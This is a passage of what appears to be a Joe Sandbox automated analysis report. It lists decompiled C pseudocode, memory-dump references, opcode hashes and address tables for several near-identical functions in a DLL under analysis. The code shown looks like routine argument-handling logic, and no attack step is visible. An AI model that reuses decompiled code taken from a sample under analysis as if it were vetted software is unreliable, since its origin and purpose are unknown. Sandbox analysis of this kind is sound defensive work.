                                                                      0x180017bf9
                                                                      0x180017bfe
                                                                      0x180017c03
                                                                      0x180017c10
                                                                      0x180017c1f

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4367ebbfd093b150e7678eadf48f48945fc90aaef7a0d894a5c0fbce1c93a1fa
                                                                      • Instruction ID: 7af2b9b5ef03c7d21370b7fe46cfd3f69a3d97985129d306c83d5275e7a94acd
                                                                      • Opcode Fuzzy Hash: 4367ebbfd093b150e7678eadf48f48945fc90aaef7a0d894a5c0fbce1c93a1fa
                                                                      • Instruction Fuzzy Hash: A9319172204A48C6DBA18F29E0803AD77B0F39CB8CF648129EB8D4B752DF36C196C754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180019C28(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019c53;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80019d20;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019c94;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019d22;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80019d12;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80019cce;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80019d22;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80019cc6;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019cc9;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180019c28
                                                                      0x180019c39
                                                                      0x180019c3c
                                                                      0x180019c3e
                                                                      0x180019c43
                                                                      0x180019c4b
                                                                      0x180019c4e
                                                                      0x180019c5d
                                                                      0x180019c5f
                                                                      0x180019c65
                                                                      0x180019c68
                                                                      0x180019c6d
                                                                      0x180019c71
                                                                      0x180019c78
                                                                      0x180019c7e
                                                                      0x180019c83
                                                                      0x180019c88
                                                                      0x180019c8f
                                                                      0x180019c9f
                                                                      0x180019ca1
                                                                      0x180019cab
                                                                      0x180019caf
                                                                      0x180019cb7
                                                                      0x180019cb9
                                                                      0x180019cbf
                                                                      0x180019cc3
                                                                      0x180019cc6
                                                                      0x180019ccc
                                                                      0x180019cce
                                                                      0x180019cd2
                                                                      0x180019cd8
                                                                      0x180019ce2
                                                                      0x180019ce4
                                                                      0x180019ce8
                                                                      0x180019ceb
                                                                      0x180019cf2
                                                                      0x180019cf6
                                                                      0x180019cfd
                                                                      0x180019d01
                                                                      0x180019d06
                                                                      0x180019d0b
                                                                      0x180019d10
                                                                      0x180019d1d
                                                                      0x180019d2c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0bb65c301b143c26c87f7e415c62068c8a6626b606e6fe468c7acbb598a0095e
                                                                      • Instruction ID: faefe2925552060c0e23cdbfdbbaf1b26b61dc8326de1354035256e1d65e3d74
                                                                      • Opcode Fuzzy Hash: 0bb65c301b143c26c87f7e415c62068c8a6626b606e6fe468c7acbb598a0095e
                                                                      • Instruction Fuzzy Hash: D8317172205B98C6EB658F69E0413AD7BA0F39DB88F258125EB8C4B751CF36C556CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017C70(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017c9b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80017d68;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017cdc;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80017d6a;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80017d5a;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80017d16;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80017d6a;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800245A8(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80017d0e;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80017d11;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180017c70
                                                                      0x180017c81
                                                                      0x180017c84
                                                                      0x180017c86
                                                                      0x180017c8b
                                                                      0x180017c93
                                                                      0x180017c96
                                                                      0x180017ca5
                                                                      0x180017ca7
                                                                      0x180017cad
                                                                      0x180017cb0
                                                                      0x180017cb5
                                                                      0x180017cb9
                                                                      0x180017cc0
                                                                      0x180017cc6
                                                                      0x180017ccb
                                                                      0x180017cd0
                                                                      0x180017cd7
                                                                      0x180017ce7
                                                                      0x180017ce9
                                                                      0x180017cf3
                                                                      0x180017cf7
                                                                      0x180017cff
                                                                      0x180017d01
                                                                      0x180017d07
                                                                      0x180017d0b
                                                                      0x180017d0e
                                                                      0x180017d14
                                                                      0x180017d16
                                                                      0x180017d1a
                                                                      0x180017d20
                                                                      0x180017d2a
                                                                      0x180017d2c
                                                                      0x180017d30
                                                                      0x180017d33
                                                                      0x180017d3a
                                                                      0x180017d3e
                                                                      0x180017d45
                                                                      0x180017d49
                                                                      0x180017d4e
                                                                      0x180017d53
                                                                      0x180017d58
                                                                      0x180017d65
                                                                      0x180017d74

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c1ea1d66e4ba8b7d9c8ee764a6d804a7b25964b292edb6ee08f7a95ed075a063
                                                                      • Instruction ID: 5fef8ec6d201c8a06d91d9666bdc223ee7feb75f665b3b6c48c7dd257fd20efd
                                                                      • Opcode Fuzzy Hash: c1ea1d66e4ba8b7d9c8ee764a6d804a7b25964b292edb6ee08f7a95ed075a063
                                                                      • Instruction Fuzzy Hash: 6C317372204B98C6DB618F29E4413AD7BB0E79DB8CF658129EB8C4B752DF36C196C704
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180019D30(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019d5b;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80019e28;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019d9c;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019e2a;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80019e1a;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80019dd6;
                                                                      				 *_t72 = 2;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80019e2a;
                                                                      				_v24 = _t44;
                                                                      				r8d = 2;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80019dce;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80019dd1;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180019d30
                                                                      0x180019d41
                                                                      0x180019d44
                                                                      0x180019d46
                                                                      0x180019d4b
                                                                      0x180019d53
                                                                      0x180019d56
                                                                      0x180019d65
                                                                      0x180019d67
                                                                      0x180019d6d
                                                                      0x180019d70
                                                                      0x180019d75
                                                                      0x180019d79
                                                                      0x180019d80
                                                                      0x180019d86
                                                                      0x180019d8b
                                                                      0x180019d90
                                                                      0x180019d97
                                                                      0x180019da7
                                                                      0x180019da9
                                                                      0x180019db3
                                                                      0x180019db7
                                                                      0x180019dbf
                                                                      0x180019dc1
                                                                      0x180019dc7
                                                                      0x180019dcb
                                                                      0x180019dce
                                                                      0x180019dd4
                                                                      0x180019dd6
                                                                      0x180019dda
                                                                      0x180019de0
                                                                      0x180019dea
                                                                      0x180019dec
                                                                      0x180019df0
                                                                      0x180019df3
                                                                      0x180019dfa
                                                                      0x180019dfe
                                                                      0x180019e05
                                                                      0x180019e09
                                                                      0x180019e0e
                                                                      0x180019e13
                                                                      0x180019e18
                                                                      0x180019e25
                                                                      0x180019e34

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a2242ff16dcbabafc54308690846610162e116e8a71540af0e692c8b4d99106
                                                                      • Instruction ID: d3591ff28e4f0e648b7157e03546eb31fcf53caf444c6298e55634ea3d6c2544
                                                                      • Opcode Fuzzy Hash: 7a2242ff16dcbabafc54308690846610162e116e8a71540af0e692c8b4d99106
                                                                      • Instruction Fuzzy Hash: D631A272205B88C6EB618F69E0403AD7BA0F39DB8CF248125EB8C4B751CF36C156CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 52%
                                                                      			E00000001180017D78(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				void* __rdi;
                                                                      				signed int _t42;
                                                                      				long long _t44;
                                                                      				intOrPtr _t57;
                                                                      				signed long long _t58;
                                                                      				intOrPtr _t61;
                                                                      				signed long long _t62;
                                                                      				long long _t65;
                                                                      				intOrPtr _t68;
                                                                      				long long _t69;
                                                                      				long long* _t72;
                                                                      				long long _t73;
                                                                      				void* _t74;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t65 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80017da3;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t68 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t68 - 8));
                                                                      				goto 0x80017e70;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80017de4;
                                                                      				_t57 =  *((intOrPtr*)(_t68 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t57 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t57 + 0x2c)) = 0x16;
                                                                      				_t58 =  *((intOrPtr*)(_t68 + 8));
                                                                      				_v16 = _t58;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t58, __rcx, _t68, __rdx, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80017e72;
                                                                      				if ( *((intOrPtr*)(_t68 + 0x470)) != 1) goto 0x80017e62;
                                                                      				_t44 =  *((intOrPtr*)(_t68 + 0x34));
                                                                      				r9b =  *((intOrPtr*)(_t65 + 0x39));
                                                                      				_t72 = _t65 + (_t58 + _t58 * 2 + 0x90) * 8;
                                                                      				if ( *_t72 != 0) goto 0x80017e1e;
                                                                      				 *_t72 = 1;
                                                                      				 *((intOrPtr*)(_t72 + 4)) = r9b;
                                                                      				 *((intOrPtr*)(_t72 + 0x10)) = _t44;
                                                                      				dil = 1;
                                                                      				goto 0x80017e72;
                                                                      				_v24 = _t44;
                                                                      				r8d = 1;
                                                                      				_t69 = _t65;
                                                                      				if (E000000011800247DC(_t42, _t65, _t69, _t72, _t73, _t80, _t81) != 0) goto 0x80017e16;
                                                                      				_t61 =  *((intOrPtr*)(_t65 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t61 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t61 + 0x2c)) = 0x16;
                                                                      				_t62 =  *((intOrPtr*)(_t65 + 8));
                                                                      				_v16 = _t62;
                                                                      				_v24 = _t73;
                                                                      				E00000001180013858(_t62, _t65, _t69, _t72, _t74, _t75,  *((intOrPtr*)(_t68 - 8)));
                                                                      				goto 0x80017e19;
                                                                      				 *_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 0x488 + _t62 * 8))));
                                                                      				return 1;
                                                                      			}





















                                                                      0x180017d78
                                                                      0x180017d89
                                                                      0x180017d8c
                                                                      0x180017d8e
                                                                      0x180017d93
                                                                      0x180017d9b
                                                                      0x180017d9e
                                                                      0x180017dad
                                                                      0x180017daf
                                                                      0x180017db5
                                                                      0x180017db8
                                                                      0x180017dbd
                                                                      0x180017dc1
                                                                      0x180017dc8
                                                                      0x180017dce
                                                                      0x180017dd3
                                                                      0x180017dd8
                                                                      0x180017ddf
                                                                      0x180017def
                                                                      0x180017df1
                                                                      0x180017dfb
                                                                      0x180017dff
                                                                      0x180017e07
                                                                      0x180017e09
                                                                      0x180017e0f
                                                                      0x180017e13
                                                                      0x180017e16
                                                                      0x180017e1c
                                                                      0x180017e1e
                                                                      0x180017e22
                                                                      0x180017e28
                                                                      0x180017e32
                                                                      0x180017e34
                                                                      0x180017e38
                                                                      0x180017e3b
                                                                      0x180017e42
                                                                      0x180017e46
                                                                      0x180017e4d
                                                                      0x180017e51
                                                                      0x180017e56
                                                                      0x180017e5b
                                                                      0x180017e60
                                                                      0x180017e6d
                                                                      0x180017e7c

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6d863db1638a81a34dae96bdd743084cf9f243e5f12942c23efbfeae5e0cda0
                                                                      • Instruction ID: 73ad96e78fc9c793316c42f134fa0c3dee93948291d882237c296608bf454a13
                                                                      • Opcode Fuzzy Hash: c6d863db1638a81a34dae96bdd743084cf9f243e5f12942c23efbfeae5e0cda0
                                                                      • Instruction Fuzzy Hash: C9314E72204B8885DB658F29E0413AD7BF0E39DB88F658115EA8C4B752CF36C596C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 49%
                                                                      			E00000001180019E38(void* __eax, long long __rbx, long long __rcx, long long* __rdx, long long _a8) {
                                                                      				signed long long _v16;
                                                                      				long long _v24;
                                                                      				long long _t43;
                                                                      				intOrPtr _t56;
                                                                      				signed long long _t57;
                                                                      				intOrPtr _t60;
                                                                      				signed long long _t61;
                                                                      				long long _t64;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr* _t68;
                                                                      				long long* _t71;
                                                                      				long long _t72;
                                                                      				void* _t73;
                                                                      				void* _t74;
                                                                      				void* _t79;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t64 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 1) goto 0x80019e63;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t67 =  *((intOrPtr*)(__rcx + 0x18));
                                                                      				 *__rdx =  *((intOrPtr*)(_t67 - 8));
                                                                      				goto 0x80019f32;
                                                                      				if (__eax - 0x63 <= 0) goto 0x80019ea4;
                                                                      				_t56 =  *((intOrPtr*)(_t67 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t56 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t56 + 0x2c)) = 0x16;
                                                                      				_t57 =  *((intOrPtr*)(_t67 + 8));
                                                                      				_v16 = _t57;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t57, __rcx, _t67, __rdx, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019f34;
                                                                      				if ( *((intOrPtr*)(_t67 + 0x470)) != 1) goto 0x80019f24;
                                                                      				_t43 =  *((intOrPtr*)(_t67 + 0x34));
                                                                      				r9d =  *(_t64 + 0x3a) & 0x0000ffff;
                                                                      				_t71 = _t64 + (_t57 + _t57 * 2 + 0x90) * 8;
                                                                      				if ( *_t71 != 0) goto 0x80019ee0;
                                                                      				 *_t71 = 2;
                                                                      				 *((intOrPtr*)(_t71 + 4)) = r9w;
                                                                      				 *((intOrPtr*)(_t71 + 0x10)) = _t43;
                                                                      				dil = 1;
                                                                      				goto 0x80019f34;
                                                                      				_v24 = _t43;
                                                                      				r8d = 2;
                                                                      				_t68 = _t64;
                                                                      				if (E00000001180024A10(_t64, _t68, _t71, _t73, _t79) != 0) goto 0x80019ed8;
                                                                      				_t60 =  *((intOrPtr*)(_t64 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t60 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t60 + 0x2c)) = 0x16;
                                                                      				_t61 =  *((intOrPtr*)(_t64 + 8));
                                                                      				_v16 = _t61;
                                                                      				_v24 = _t72;
                                                                      				E00000001180013858(_t61, _t64, _t68, _t71, _t73, _t74,  *((intOrPtr*)(_t67 - 8)));
                                                                      				goto 0x80019edb;
                                                                      				 *_t71 =  *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x488 + _t61 * 8))));
                                                                      				return 1;
                                                                      			}


















                                                                      0x180019e38
                                                                      0x180019e49
                                                                      0x180019e4c
                                                                      0x180019e4e
                                                                      0x180019e53
                                                                      0x180019e5b
                                                                      0x180019e5e
                                                                      0x180019e6d
                                                                      0x180019e6f
                                                                      0x180019e75
                                                                      0x180019e78
                                                                      0x180019e7d
                                                                      0x180019e81
                                                                      0x180019e88
                                                                      0x180019e8e
                                                                      0x180019e93
                                                                      0x180019e98
                                                                      0x180019e9f
                                                                      0x180019eaf
                                                                      0x180019eb1
                                                                      0x180019ebb
                                                                      0x180019ec0
                                                                      0x180019ec8
                                                                      0x180019eca
                                                                      0x180019ed0
                                                                      0x180019ed5
                                                                      0x180019ed8
                                                                      0x180019ede
                                                                      0x180019ee0
                                                                      0x180019ee4
                                                                      0x180019eea
                                                                      0x180019ef4
                                                                      0x180019ef6
                                                                      0x180019efa
                                                                      0x180019efd
                                                                      0x180019f04
                                                                      0x180019f08
                                                                      0x180019f0f
                                                                      0x180019f13
                                                                      0x180019f18
                                                                      0x180019f1d
                                                                      0x180019f22
                                                                      0x180019f2f
                                                                      0x180019f3e

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4cb1b57cabdf7c96151d309148b507424f2973327cb8fd69934bbf46bd6256c9
